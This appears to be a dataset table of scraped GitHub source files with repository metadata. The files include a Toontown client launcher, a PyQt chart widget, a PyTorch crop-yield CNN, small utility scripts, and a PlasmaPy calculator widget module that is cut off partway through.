blob_id stringlengths 40 40 | directory_id stringlengths 40 40 | path stringlengths 3 281 | content_id stringlengths 40 40 | detected_licenses listlengths 0 57 | license_type stringclasses 2 values | repo_name stringlengths 6 116 | snapshot_id stringlengths 40 40 | revision_id stringlengths 40 40 | branch_name stringclasses 313 values | visit_date timestamp[us] | revision_date timestamp[us] | committer_date timestamp[us] | github_id int64 18.2k 668M ⌀ | star_events_count int64 0 102k | fork_events_count int64 0 38.2k | gha_license_id stringclasses 17 values | gha_event_created_at timestamp[us] | gha_created_at timestamp[us] | gha_language stringclasses 107 values | src_encoding stringclasses 20 values | language stringclasses 1 value | is_vendor bool 2 classes | is_generated bool 2 classes | length_bytes int64 4 6.02M | extension stringclasses 78 values | content stringlengths 2 6.02M | authors listlengths 1 1 | author stringlengths 0 175 |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
234fe0703bcd32e0a8e3cea1e43969c845b3ac6e | ba0cbdae81c171bd4be7b12c0594de72bd6d625a | /MyToontown/Toontown2016/toontown/toonbase/ToontownStartDist.py | 6718c47b2d8ad07f5cb8e4b83442d6bf516c3334 | [] | no_license | sweep41/Toontown-2016 | 65985f198fa32a832e762fa9c59e59606d6a40a3 | 7732fb2c27001264e6dd652c057b3dc41f9c8a7d | refs/heads/master | 2021-01-23T16:04:45.264205 | 2017-06-04T02:47:34 | 2017-06-04T02:47:34 | 93,279,679 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 6,538 | py | # This is the "main" module that will start a distribution copy of
# Toontown 2016
# Replace some modules that do exec:
# NOTE(review): namedtuple is stubbed out to return the bare tuple type,
# presumably to avoid exec() in a frozen distribution — any code relying on
# named fields will silently lose them; confirm this is intended.
import collections
collections.namedtuple = lambda *x: tuple
# This is included in the package by the prepare_client script. It contains the
# PRC file data, (stripped) DC file, and time zone info:
import game_data
# Load all of the packaged PRC config page(s):
from pandac.PandaModules import *
for i, config in enumerate(game_data.CONFIG):
    name = 'GameData config page #{0}'.format(i)
    loadPrcFileData(name, config)
# The VirtualFileSystem, which has already initialized, doesn't see the mount
# directives in the config(s) yet. We have to force it to load them manually:
vfs = VirtualFileSystem.getGlobalPtr()
mounts = ConfigVariableList('vfs-mount')
for mount in mounts:
    # Pad with Nones so a directive with fewer than two tokens still unpacks;
    # a missing mount point then reaches Filename(None) below.
    mountFile, mountPoint = (mount.split(' ', 2) + [None, None, None])[:2]
    mountFile = Filename(mountFile)
    mountFile.makeAbsolute()
    mountPoint = Filename(mountPoint)
    vfs.mount(mountFile, mountPoint, 0)
# To read the DC file as a StringStream, we must override the ClientRepository:
dcStream = StringStream(game_data.DC)
from direct.distributed import ConnectionRepository
import types
class ConnectionRepository_override(ConnectionRepository.ConnectionRepository):
    """Override of ConnectionRepository that reads the DC definitions from the
    in-memory ``dcStream`` (built from ``game_data.DC``) instead of from files
    on disk. Python 2 code: uses ``xrange`` and ``types.ClassType``."""
    def readDCFile(self, dcFileNames=None):
        # ``dcFileNames`` is accepted for signature compatibility but ignored;
        # the packaged DC stream is always used instead.
        dcFile = self.getDcFile()
        dcFile.clear()
        self.dclassesByName = {}
        self.dclassesByNumber = {}
        self.hashVal = 0
        dcImports = {}
        readResult = dcFile.read(dcStream, 'DC stream')
        if not readResult:
            self.notify.error("Could not read dc file.")
        self.hashVal = dcFile.getHash()
        # First pass: import every module named in the DC file, applying the
        # repository's dcSuffix ('AI', 'UD', ...) when the DC entry lists it.
        for n in xrange(dcFile.getNumImportModules()):
            moduleName = dcFile.getImportModule(n)[:]
            # Entries look like "module/AI/UD": base name, then suffix tokens.
            suffix = moduleName.split('/')
            moduleName = suffix[0]
            suffix=suffix[1:]
            if self.dcSuffix in suffix:
                moduleName += self.dcSuffix
            elif self.dcSuffix == 'UD' and 'AI' in suffix: #HACK:
                moduleName += 'AI'
            importSymbols = []
            for i in xrange(dcFile.getNumImportSymbols(n)):
                symbolName = dcFile.getImportSymbol(n, i)
                suffix = symbolName.split('/')
                symbolName = suffix[0]
                suffix=suffix[1:]
                if self.dcSuffix in suffix:
                    symbolName += self.dcSuffix
                elif self.dcSuffix == 'UD' and 'AI' in suffix: #HACK:
                    symbolName += 'AI'
                importSymbols.append(symbolName)
            self.importModule(dcImports, moduleName, importSymbols)
        # Second pass: bind each DC class to its Python class definition,
        # trying suffixed names first and falling back to the bare name.
        for i in xrange(dcFile.getNumClasses()):
            dclass = dcFile.getClass(i)
            number = dclass.getNumber()
            className = dclass.getName() + self.dcSuffix
            classDef = dcImports.get(className)
            if classDef is None and self.dcSuffix == 'UD':
                className = dclass.getName() + 'AI'
                classDef = dcImports.get(className)
            if classDef == None:
                className = dclass.getName()
                classDef = dcImports.get(className)
            if classDef is None:
                self.notify.debug("No class definition for %s." % (className))
            else:
                if type(classDef) == types.ModuleType:
                    if not hasattr(classDef, className):
                        self.notify.warning("Module %s does not define class %s." % (className, className))
                        continue
                    classDef = getattr(classDef, className)
                # Python 2: accept both old-style and new-style classes.
                if type(classDef) != types.ClassType and type(classDef) != types.TypeType:
                    self.notify.error("Symbol %s is not a class name." % (className))
                else:
                    dclass.setClassDef(classDef)
            self.dclassesByName[className] = dclass
            if number >= 0:
                self.dclassesByNumber[number] = dclass
        # Owner-view pass: repeat the import/bind steps for the 'OV' suffix.
        if self.hasOwnerView():
            ownerDcSuffix = self.dcSuffix + 'OV'
            ownerImportSymbols = {}
            for n in xrange(dcFile.getNumImportModules()):
                moduleName = dcFile.getImportModule(n)
                suffix = moduleName.split('/')
                moduleName = suffix[0]
                suffix=suffix[1:]
                if ownerDcSuffix in suffix:
                    moduleName = moduleName + ownerDcSuffix
                importSymbols = []
                for i in xrange(dcFile.getNumImportSymbols(n)):
                    symbolName = dcFile.getImportSymbol(n, i)
                    suffix = symbolName.split('/')
                    symbolName = suffix[0]
                    suffix=suffix[1:]
                    if ownerDcSuffix in suffix:
                        symbolName += ownerDcSuffix
                    importSymbols.append(symbolName)
                    # Remember every owner-view symbol so the class pass below
                    # only binds classes that were actually imported.
                    ownerImportSymbols[symbolName] = None
                self.importModule(dcImports, moduleName, importSymbols)
            for i in xrange(dcFile.getNumClasses()):
                dclass = dcFile.getClass(i)
                if ((dclass.getName()+ownerDcSuffix) in ownerImportSymbols):
                    number = dclass.getNumber()
                    className = dclass.getName() + ownerDcSuffix
                    classDef = dcImports.get(className)
                    if classDef is None:
                        self.notify.error("No class definition for %s." % className)
                    else:
                        if type(classDef) == types.ModuleType:
                            if not hasattr(classDef, className):
                                self.notify.error("Module %s does not define class %s." % (className, className))
                            classDef = getattr(classDef, className)
                        dclass.setOwnerClassDef(classDef)
                    self.dclassesByName[className] = dclass
ConnectionRepository.ConnectionRepository = ConnectionRepository_override
# We also need timezone stuff:
class dictloader(object):
    """Minimal loader object that serves resource data out of a dict.

    Exposes ``get_data`` with loader-style semantics so it can be assigned
    to a module's ``__loader__`` (here: serving zoneinfo files for pytz
    from an in-memory mapping).
    """
    def __init__(self, dict):
        # Backing mapping of resource path -> raw data bytes.
        self.dict = dict
    def get_data(self, key):
        # Normalize Windows-style separators before looking the key up;
        # unknown keys yield None (plain dict.get semantics).
        normalized_key = key.replace('\\', '/')
        return self.dict.get(normalized_key)
import pytz
# Serve pytz's zoneinfo resource reads from the packaged in-memory mapping
# instead of files on disk.
pytz.__loader__ = dictloader(game_data.ZONEINFO)
# Finally, start the game:
import toontown.toonbase.ToontownStart
| [
"sweep14@gmail.com"
] | sweep14@gmail.com |
42c8a383b2d310a0e02a6e8acb97b3e392f78b79 | 2e72c5ab40eed0dd41ffb2c6cc902c019434cd55 | /MainPage/findClosestBranch.py | 8f31ae807402216c2ba1e687f7644f72902e2c54 | [] | no_license | MateuszsuetaM/ussr | 445c777df0656178d153ab0f5b43d4b052cb48ce | 9e62714ef8f3d79f97bc07bc376d97cb6372de52 | refs/heads/master | 2021-09-03T11:27:23.959714 | 2018-01-08T18:11:22 | 2018-01-08T18:11:22 | 111,199,941 | 0 | 0 | null | 2017-11-25T13:22:07 | 2017-11-18T11:25:52 | Python | UTF-8 | Python | false | false | 622 | py | from math import cos, asin, sqrt
from company import models
def distance(lat1, lon1, lat2, lon2):
    """Great-circle distance in kilometres between two lat/lon points.

    Uses the haversine formula with a mean Earth radius of 6371 km.
    Inputs are in degrees.
    """
    deg_to_rad = 0.017453292519943295  # pi / 180
    lat_term = (1 - cos((lat2 - lat1) * deg_to_rad)) / 2
    lon_term = cos(lat1 * deg_to_rad) * cos(lat2 * deg_to_rad) * (1 - cos((lon2 - lon1) * deg_to_rad)) / 2
    # 12742 km = Earth's diameter (2 * 6371 km).
    return 12742 * asin(sqrt(lat_term + lon_term))
def getClosest(u_lat, u_lon):
    """Return the CompanyBranch nearest to the point (u_lat, u_lon).

    Parameters
    ----------
    u_lat, u_lon : float
        The user's latitude and longitude, in degrees.

    Returns
    -------
    The closest branch object, or the empty string if there are no
    branches at all (preserving the original sentinel behaviour).
    """
    closestBranch = ''
    closestDistance = -1
    # BUG FIX: the module imports `from company import models`, so the model
    # must be referenced as models.CompanyBranch (the bare name raised
    # NameError); `.all()` makes the queryset iteration explicit.
    for branch in models.CompanyBranch.objects.all():
        tmpDistance = distance(branch.latitude, branch.longitude, u_lat, u_lon)
        # -1 marks "no branch seen yet"; afterwards keep the minimum.
        if closestDistance == -1 or closestDistance > tmpDistance:
            closestDistance = tmpDistance
            closestBranch = branch
    return closestBranch
| [
"ksazon@sigma.ug.edu.pl"
] | ksazon@sigma.ug.edu.pl |
976ee0ae69a2b1866f4ac2bf56a9bc4c1732988a | d8e4c9182c83ef781e2b574cd639917ecd38a53a | /ralgraph/chart.py | 07c1f0a5891c0850ea04238b64b8002c3a7563bf | [] | no_license | mirmik/ralgraph | b98fa39904b1e5cea4cfde9f4e6a81a3b7728999 | a66da89ab85b86b7d68787b8b199267f12c40da7 | refs/heads/master | 2020-07-03T12:20:35.018998 | 2020-04-06T10:00:35 | 2020-04-06T10:00:35 | 201,902,647 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,309 | py | #!/usr/bin/python3
from PyQt5.QtWidgets import *
from PyQt5.QtCore import *
from PyQt5.QtGui import *
import numpy
import time
import threading
class ArrayChart:
    """A polyline chart: maps data coordinates into the [-1, 1] square and
    paints itself onto an attached PlotWidget."""
    def __init__(self, plot=None):
        self.plot = plot
        self.x_chart_coords = []
        self.y_chart_coords = []
        # Until an explicit range is set, the bounds grow to fit the data.
        self.autoscale = True
        self.xmin = float("inf")
        self.ymin = float("inf")
        self.xmax = -float("inf")
        self.ymax = -float("inf")
        if plot is not None:
            self.plot.attach_chart(self)
    def redraw(self):
        """Ask the owning plot widget to repaint."""
        self.plot.redraw()
    def set_vertices(self, vtxs):
        self.vertices = vtxs
    def set_color(self, r, g, b, a=1):
        """Set the pen colour from RGBA components in [0, 1]."""
        self.qcolor = QColor.fromRgbF(r, g, b, a)
    def set_xrange(self, xmin, xmax):
        """Fix the horizontal data range and turn off autoscaling."""
        self.xmin, self.xmax = xmin, xmax
        self.autoscale = False
    def set_yrange(self, ymin, ymax):
        """Fix the vertical data range and turn off autoscaling."""
        self.ymin, self.ymax = ymin, ymax
        self.autoscale = False
    def set_xcoords(self, xarr):
        # Map xarr into [-1, 1] using the current (or freshly grown) bounds.
        if self.autoscale:
            for value in xarr:
                self.xmax = max(self.xmax, value)
                self.xmin = min(self.xmin, value)
        scale = 2 / (self.xmax - self.xmin)
        self.x_chart_coords = [((value - self.xmin) * scale) - 1 for value in xarr]
    def set_ycoords(self, yarr):
        # Same normalisation as set_xcoords, along the vertical axis.
        if self.autoscale:
            for value in yarr:
                self.ymax = max(self.ymax, value)
                self.ymin = min(self.ymin, value)
        scale = 2 / (self.ymax - self.ymin)
        self.y_chart_coords = [((value - self.ymin) * scale) - 1 for value in yarr]
    def set_coords(self, x, y):
        self.set_xcoords(x)
        self.set_ycoords(y)
    def draw(self, painter, center, whalf, hhalf):
        """Paint the polyline; normalised coords are scaled by the half
        extents (whalf, hhalf) around the given center point."""
        painter.setPen(self.qcolor)
        points = [
            center + QPointF(x * whalf, y * hhalf)
            for x, y in zip(self.x_chart_coords, self.y_chart_coords)
        ]
        for start, end in zip(points, points[1:]):
            painter.drawLine(start, end)
class PlotWidget(QWidget):
    """A QWidget that owns a list of ArrayCharts and paints them inside a
    margined plot area with an optional left/bottom axis border.

    Margin order (from the setters below): [left, right, top, bottom].
    """
    def __init__(self):
        QWidget.__init__(self)
        #self.vertices = []
        self.charts = []
        # [left, right, top, bottom] margins in pixels.
        self.margins = [80,20,20,50]
        self.border=True
        self.set_border_color(0.5,0.5,0.5)
        self.set_background(0,0,0)
    def set_background(self, r, g, b):
        """Set the widget background colour from RGB components in [0, 1]."""
        pal = self.palette();
        pal.setColor(QPalette.Background, QColor.fromRgbF(r,g,b))
        self.setAutoFillBackground(True)
        self.setPalette(pal)
    def set_border_color(self, r, g, b):
        """Set the axis-border pen colour from RGB components in [0, 1]."""
        self._border_color = QColor.fromRgbF(r,g,b)
    def attach_chart(self, chart):
        """Register a chart with this plot and point the chart back at us."""
        self.charts.append(chart)
        chart.plot = self
    def redraw(self):
        # Schedule a repaint; Qt will call paintEvent asynchronously.
        self.update()
    def set_left_margin(self, arg):
        self.margins[0] = arg
        self.redraw()
    def set_bottom_margin(self, arg):
        self.margins[3] = arg
        self.redraw()
    def set_top_margin(self, arg):
        self.margins[2] = arg
        self.redraw()
    def set_right_margin(self, arg):
        self.margins[1] = arg
        self.redraw()
    def set_margins(self, mrgs):
        """Replace all four margins at once: [left, right, top, bottom]."""
        self.margins = mrgs
        self.redraw()
    def paintEvent(self, ev):
        # Compute the inner plot rectangle and hand every chart the centre
        # point plus half-extents so charts can map [-1, 1] coords to pixels.
        w = self.width() - self.margins[0] - self.margins[1]
        h = self.height() - self.margins[2] - self.margins[3]
        w_half = w/2
        h_half = h/2
        c = QPointF(w_half + self.margins[0], h_half+self.margins[2])
        painter = QPainter(self)
        for chart in self.charts:
            chart.draw(painter, c, w_half, h_half)
        if self.border:
            painter.setPen(self._border_color)
        if self.border:
            # Left axis line, then bottom axis line.
            painter.drawLine(QPoint(self.margins[0], self.margins[2]), QPoint(self.margins[0], self.height()-self.margins[3]))
            painter.drawLine(QPoint(self.margins[0], self.height()-self.margins[3]), QPoint(self.width()-self.margins[1], self.height()-self.margins[3]))
        painter.end()
if __name__ == "__main__":
    # Demo: two animated sin/cos traces scrolling to the right.
    import sys
    app = QApplication(sys.argv[1:])
    plot = PlotWidget()
    chart = ArrayChart(plot)
    chart2 = ArrayChart(plot)
    t = numpy.linspace(-100, 100, 1000)
    y = numpy.sin(t*0.2) * 100
    y2 = numpy.cos(t*0.2) * 100
    chart.set_color(1,0,0)
    chart2.set_color(0,1,0)
    chart.set_coords(t, y)
    chart2.set_coords(t, y2)
    chart.redraw()
    chart2.redraw()
    class Thr(QThread):
        # Background thread that scrolls the x-window and refreshes both
        # charts roughly every 10 ms.
        def run(self):
            stime = time.time()
            while 1:
                ctime = time.time() - stime
                t = numpy.linspace(-100+ctime*5, 100+ctime*5, 1000)
                y = numpy.sin(t*0.2) * 100
                y2 = numpy.cos(t*0.2) * 100
                # Pin the x-range so the traces scroll instead of rescaling.
                chart.set_xrange(-100+ctime*5, 100+ctime*5)
                chart2.set_xrange(-100+ctime*5, 100+ctime*5)
                chart.set_coords(t, y)
                chart2.set_coords(t, y2)
                chart.redraw()
                chart2.redraw()
                time.sleep(0.01)
    thr = Thr()
    thr.start()
    plot.show()
app.exec() | [
"netricks@protonmail.com"
] | netricks@protonmail.com |
910aba7d092e6fe88237d6d7c73f25a5638d20a8 | c70dfc0d74b34e41f7d2dbdbd6bfaca2f79af55b | /cyp/models/convnet.py | 7e74e171c0c26477317c14467986b5411a787c77 | [
"MIT"
] | permissive | jeangolay/pycrop-yield-prediction | a2c65fa3bd704d1d3251318a9afe39bfcd05cf10 | 1b36b673cc58b506ad4d3c8bd6b6917ac5a72d28 | refs/heads/master | 2021-02-18T06:58:31.844163 | 2019-11-25T13:45:55 | 2019-11-25T13:45:55 | 245,172,915 | 0 | 1 | MIT | 2020-03-05T13:39:21 | 2020-03-05T13:39:20 | null | UTF-8 | Python | false | false | 7,994 | py | import torch
from torch import nn
import torch.nn.functional as F
from pathlib import Path
from .base import ModelBase
class ConvModel(ModelBase):
    """
    A PyTorch replica of the CNN structured model from the original paper. Note that
    this class assumes feature_engineering was run with channels_first=True
    Parameters
    ----------
    in_channels: int, default=9
        Number of channels in the input data. Default taken from the number of bands in the
        MOD09A1 + the number of bands in the MYD11A2 datasets
    dropout: float, default=0.5
        Default taken from the original paper
    dense_features: list, or None, default=None.
        output feature size of the Linear layers. If None, default values will be taken from the paper.
        The length of the list defines how many linear layers are used.
    time: int, default=32
        The number of timesteps being used. This is necessary to pass in the initializer since it will
        affect the size of the first dense layer, which is the flattened output of the conv layers
    savedir: pathlib Path, default=Path('data/models')
        The directory into which the models should be saved.
    device: torch.device
        Device to run model on. By default, checks for a GPU. If none exists, uses
        the CPU
    """
    def __init__(self, in_channels=9, dropout=0.5, dense_features=None, time=32,
                 savedir=Path('data/models'), use_gp=True, sigma=1, r_loc=0.5, r_year=1.5,
                 sigma_e=0.01, sigma_b=0.01,
                 device=torch.device('cuda:0' if torch.cuda.is_available() else 'cpu')):
        # save values for reinitialization
        self.in_channels = in_channels
        self.dropout = dropout
        self.dense_features = dense_features
        self.time = time
        model = ConvNet(in_channels=in_channels, dropout=dropout,
                        dense_features=dense_features, time=time)
        # The GP head reads the weights/bias of the LAST dense layer; their
        # state-dict keys depend on how many dense layers were configured.
        if dense_features is None:
            num_dense_layers = 2
        else:
            num_dense_layers = len(dense_features)
        model_weight = f'dense_layers.{num_dense_layers - 1}.weight'
        model_bias = f'dense_layers.{num_dense_layers - 1}.bias'
        super().__init__(model, model_weight, model_bias, 'cnn', savedir, use_gp, sigma, r_loc,
                         r_year, sigma_e, sigma_b, device)
    def reinitialize_model(self, time=None):
        # the only thing which changes here is the time value, since this affects the
        # size of the first dense layer.
        if time is None:
            time = self.time
        model = ConvNet(in_channels=self.in_channels, dropout=self.dropout,
                        dense_features=self.dense_features, time=time)
        if self.device.type != 'cpu':
            model = model.cuda()
        self.model = model
class ConvNet(nn.Module):
    """
    A crop yield conv net.
    For a description of the parameters, see the ConvModel class.
    Only handles strides of 1 and 2
    """
    def __init__(self, in_channels=9, dropout=0.5, dense_features=None, time=32):
        super().__init__()
        # values taken from the paper
        in_out_channels_list = [in_channels, 128, 256, 256, 512, 512, 512]
        stride_list = [None, 1, 2, 1, 2, 1, 2]
        # Figure out the size of the final flattened conv layer, which
        # is dependent on the input size
        num_divisors = sum([1 if i == 2 else 0 for i in stride_list])
        # Each stride-2 block halves the time axis (rounding up, because the
        # "same" padding pads odd sizes before striding).
        for i in range(num_divisors):
            if time % 2 != 0:
                time += 1
            time /= 2
        if dense_features is None:
            dense_features = [2048, 1]
        # NOTE(review): insert() mutates a caller-supplied dense_features
        # list in place — repeated construction with the same list would
        # keep prepending; confirm callers always pass a fresh list.
        # The "* 4" presumably reflects the non-time spatial extent after
        # the conv stack — TODO confirm against the feature-engineered input.
        dense_features.insert(0, int(in_out_channels_list[-1] * time * 4))
        assert len(stride_list) == len(in_out_channels_list), \
            "Stride list and out channels list must be the same length!"
        self.convblocks = nn.ModuleList([
            ConvBlock(in_channels=in_out_channels_list[i-1],
                      out_channels=in_out_channels_list[i],
                      kernel_size=3, stride=stride_list[i],
                      dropout=dropout) for
            i in range(1, len(stride_list))
        ])
        self.dense_layers = nn.ModuleList([
            nn.Linear(in_features=dense_features[i-1],
                      out_features=dense_features[i]) for
            i in range(1, len(dense_features))
        ])
        self.initialize_weights()
    def initialize_weights(self):
        # Kaiming-uniform weights, zero biases, for conv and dense layers.
        for convblock in self.convblocks:
            nn.init.kaiming_uniform_(convblock.conv.weight.data)
            # http://cs231n.github.io/neural-networks-2/#init
            # see: Initializing the biases
            nn.init.constant_(convblock.conv.bias.data, 0)
        for dense_layer in self.dense_layers:
            nn.init.kaiming_uniform_(dense_layer.weight.data)
            nn.init.constant_(dense_layer.bias.data, 0)
    def forward(self, x, return_last_dense=False):
        """
        If return_last_dense is true, the feature vector generated by the second to last
        dense layer will also be returned. This is then used to train a Gaussian Process model.
        """
        for block in self.convblocks:
            x = block(x)
        # flatten
        x = x.view(x.shape[0], -1)
        for layer_number, dense_layer in enumerate(self.dense_layers):
            x = dense_layer(x)
            # Capture the penultimate layer's output for the GP head.
            if return_last_dense and (layer_number == len(self.dense_layers) - 2):
                output = x
        if return_last_dense:
            return x, output
        return x
class ConvBlock(nn.Module):
    """One conv stage: Conv2d with TF-style "same" padding, then
    BatchNorm2d, ReLU, and Dropout, applied in that order."""
    def __init__(self, in_channels, out_channels, kernel_size, stride, dropout):
        super().__init__()
        # Attribute names are kept stable so existing checkpoints still load.
        self.conv = Conv2dSamePadding(
            in_channels=in_channels,
            out_channels=out_channels,
            kernel_size=kernel_size,
            stride=stride,
        )
        self.batchnorm = nn.BatchNorm2d(num_features=out_channels)
        self.relu = nn.ReLU()
        self.dropout = nn.Dropout(dropout)
    def forward(self, x):
        convolved = self.conv(x)
        normalized = self.batchnorm(convolved)
        activated = self.relu(normalized)
        return self.dropout(activated)
class Conv2dSamePadding(nn.Conv2d):
    """Represents the "Same" padding functionality from Tensorflow.
    See: https://github.com/pytorch/pytorch/issues/3867
    This solution is mostly copied from
    https://github.com/pytorch/pytorch/issues/3867#issuecomment-349279036
    Note that the padding argument in the initializer doesn't do anything now
    """
    def forward(self, input):
        # Delegate to the module-level helper, which computes the TF-style
        # asymmetric padding before calling F.conv2d.
        return conv2d_same_padding(input, self.weight, self.bias, self.stride,
                                   self.dilation, self.groups)
def conv2d_same_padding(input, weight, bias=None, stride=1, dilation=1, groups=1):
    """Functional 2D convolution with TensorFlow-style "SAME" padding.

    Pads the input so the output spatial size equals
    ``ceil(input_size / stride)`` per axis; when the required padding is
    odd, the extra row/column goes on the bottom/right (as TensorFlow does).

    Parameters
    ----------
    input : torch.Tensor, shape (N, C_in, H, W)
    weight : torch.Tensor, shape (C_out, C_in // groups, kH, kW)
    bias : torch.Tensor or None
    stride, dilation : int or tuple of 2 ints
        BUG FIX: scalar values are now accepted. Previously the declared
        defaults (``1``) crashed with TypeError because the body indexed
        into them (``stride[0]``).
    groups : int

    Returns
    -------
    torch.Tensor
        The convolution result.
    """
    # Normalise scalar arguments to (rows, cols) tuples so both the
    # documented defaults and explicit ints work.
    if isinstance(stride, int):
        stride = (stride, stride)
    if isinstance(dilation, int):
        dilation = (dilation, dilation)
    # Rows: total padding needed so out_rows == ceil(in_rows / stride).
    input_rows = input.size(2)
    filter_rows = weight.size(2)
    effective_filter_size_rows = (filter_rows - 1) * dilation[0] + 1
    out_rows = (input_rows + stride[0] - 1) // stride[0]
    padding_rows = max(0, (out_rows - 1) * stride[0] + effective_filter_size_rows - input_rows)
    rows_odd = (padding_rows % 2 != 0)
    # Columns: same computation along the width axis.
    input_cols = input.size(3)
    filter_cols = weight.size(3)
    effective_filter_size_cols = (filter_cols - 1) * dilation[1] + 1
    out_cols = (input_cols + stride[1] - 1) // stride[1]
    padding_cols = max(0, (out_cols - 1) * stride[1] + effective_filter_size_cols - input_cols)
    cols_odd = (padding_cols % 2 != 0)
    # F.conv2d only supports symmetric padding, so an odd remainder is
    # pre-padded on the right/bottom edge before the convolution.
    if rows_odd or cols_odd:
        input = F.pad(input, [0, int(cols_odd), 0, int(rows_odd)])
    return F.conv2d(input, weight, bias, stride,
                    padding=(padding_rows // 2, padding_cols // 2),
                    dilation=dilation, groups=groups)
| [
"gabriel.tseng@mail.mcgill.ca"
] | gabriel.tseng@mail.mcgill.ca |
2e230cb8aa62731299b1f164e9a99323b26e1092 | 727d8e53595146fcb20a1fc9ede035027caa78e0 | /fixAddPlants.py | 811caca48f68155a4a71f49c7484616654f2a039 | [] | no_license | yzyly1992/PWP-Lib-Crawler | b5de68c26e72ccf46bb89bfc5c68d0158d0e044e | 7c14d1444a230c2cd4b33160afa2a57299735b7b | refs/heads/master | 2021-05-23T15:16:16.497585 | 2020-10-09T00:50:55 | 2020-10-09T00:50:55 | 253,356,336 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 313 | py | import os, re
import json
# One-shot maintenance script: for every plant record, derive the macOS
# mount path from the Windows share path and write the records back.
with open("plants.json", "r") as jsonFile:
    data = json.load(jsonFile)
for record in data:
    windows_path = record["path"]
    # Flip backslashes to forward slashes, then remap the Y: drive to the
    # Mac mount point of the same library share.
    record["mac"] = windows_path.replace("\\", "/").replace("Y:", "/Volumes/Library")
with open("plants.json", "w") as f:
    json.dump(data, f)
| [
"zyang03@risd.edu"
] | zyang03@risd.edu |
85fe15a332034b335a9570daf22b21f4db86e628 | 6c7208a85a33accbae4408946a458558766787fd | /writeAbsence.py | 26afee715eb56695b0e69e45fc9603bd29ac7090 | [] | no_license | 17Pixelz/Face_Reco | f3f409537bb8c196d299cb2104e0ac8d27799feb | 40d477a847226619fa8f09ecf5dd4bd2c808d13c | refs/heads/main | 2023-05-31T11:54:47.436625 | 2021-06-24T16:35:16 | 2021-06-24T16:35:16 | 376,830,855 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 258 | py | import csv
def giveAbsenceFile(names):
    """Write absence.csv with one row per distinct name, marked 'P' (present).

    Parameters
    ----------
    names : iterable of str
        Recognised names; duplicates are collapsed via set(), so the row
        order is arbitrary.
    """
    # newline='' is required when handing a file to csv.writer — without it
    # platforms that translate line endings emit blank rows (per csv docs).
    with open('absence.csv', mode='w', newline='') as absence:
        writer = csv.writer(absence, delimiter=',', quotechar='"', quoting=csv.QUOTE_MINIMAL)
        for name in set(names):
            writer.writerow([name, 'P'])
"touamayoussef@gmail.com"
] | touamayoussef@gmail.com |
132e4ee4c793bdc4161705a02085ff9af6bd4275 | cdf4c78d609fc6cf39deaa74dae56d2ba33f027f | /basic_syntax/1_6input.py | 5d81bcc6d037727e7b73cf9ba605a95a81b678af | [] | no_license | choyeaeun/Python_study | 0b201b91e28b63a382bee1fc3c74ee3c2056844a | d0dab7aabb4579fa24dd64b42ca94d2be854264a | refs/heads/master | 2020-08-07T16:37:14.534707 | 2019-10-11T15:51:03 | 2019-10-11T15:51:03 | 213,526,906 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 261 | py | #사용자의 입력을 받는 함수 input
# Prompt for the user's name on a separate line, then echo it back.
print('what is your name?')
a = input()
print('my name is ', a)
# input() also accepts a prompt string directly, so no separate print()
# call is needed before asking the question.
mine = input('가위 바위 보 중에 하나를 내 보세요')
print('mine:', mine) | [
"silbia629@gmail.com"
] | silbia629@gmail.com |
3df046ae73258735aa27ee3942b82aec114a9ca8 | e72b8ac4d15e37fca4a34c775de490371bf3a2e1 | /plasmapy/utils/calculator/widget_helpers.py | 1a10b2c87b53d06d6d14eea15d3f0d9c28b93ecb | [
"BSD-3-Clause",
"LicenseRef-scancode-unknown-license-reference"
] | permissive | RAJAGOPALAN-GANGADHARAN/PlasmaPy | a4cd91cfcc31cfe6b69b6174d37bb094ddbf0052 | 3c1d6a72af2531a4603f227eabe74971a98da662 | refs/heads/main | 2023-01-08T05:12:02.952882 | 2022-03-19T18:00:35 | 2022-03-19T18:00:35 | 159,909,658 | 1 | 0 | NOASSERTION | 2018-12-01T04:42:14 | 2018-12-01T04:42:12 | null | UTF-8 | Python | false | false | 18,149 | py | """
Contains functions that create widgets and process properties for the calculator.
"""
__all__ = []
import abc
import importlib
import ipywidgets as widgets
from inspect import signature
from plasmapy.particles import Particle
BLACK = (0, 0, 0)
"""RGB constant for black."""
DARK_RED = (255, 0, 0)
"""RGB Constant for dark red."""
LIGHT_GREEN = (0, 128, 0)
"""RGB Constant for light green."""
ERROR_STYLE = "2px solid red"
"""Constant for error style."""
EQUAL_SPACING_CONFIG = "10px 10px 10px 10px"
"""Constant for equal spacing config among widgets."""
values_container = {}
"""stores the values of widget with corresponding ``property_name``."""
_process_queue = []
"""
Stores the functions to be processed. This data is gathered from
``properties_metadata.json``.
"""
class _GenericWidget(abc.ABC):
    """
    Generic widget class
    Parameters
    ----------
    property_name: `str`
        Name of the property the widget is associated with.
        This value is key for the values_container.
    property_alias: `str`
        Alias of the property. Useful to display in validation error messages.
    values_cont: `dict`
        Reference to global dictionary to store the values of the widgets.
    Raises
    ------
    `NotImplementedError`
        If the method `create_widget` is not implemented.
    """
    def __init__(self, property_name, property_alias="", values_cont=values_container):
        self.property_name = property_name
        # Fall back to the property name when no alias is given.
        self.property_alias = property_alias or property_name
        self.widget = None
        # NOTE: the default binds the module-level values_container dict, so
        # all widgets share one container unless a caller passes its own.
        self.values_cont = values_cont
        self.unit = None
        self.units_dropdown = None
    def set_unit(self, unit):
        """
        Set unit for the value of widget, defaults to `None`.
        Parameters
        ----------
        unit: `astropy.units.Unit`
            Unit to be set for the value of widget
        """
        self.unit = unit
    def get_widget(self):
        """
        Get current widget object reference
        Returns
        -------
        `ipywidgets.Widget`
            Current widget object reference
        """
        return self.widget
    def get_dropdown_widget(self):
        """
        Get dropdown widget associated with current widget, defaults to `None`.
        Returns
        -------
        `ipywidgets.Dropdown`
            Dropdown widget associated with current widget
        """
        return self.units_dropdown
    def set_place_holder(self, text):
        """
        Set place holder text of the widget, defaults to empty string
        Parameters
        ----------
        text: `str`
            Place holder text to be set
        """
        self.widget.placeholder = text
    @abc.abstractmethod
    def create_widget(self):
        """
        Virtual method to create widget
        """
        pass
    def post_creation(self):
        """
        Default method that is called after widget creation.
        Attaches change listener to the widget.
        """
        self.set_place_holder("")
        # handle_change fires whenever the widget's "value" trait changes.
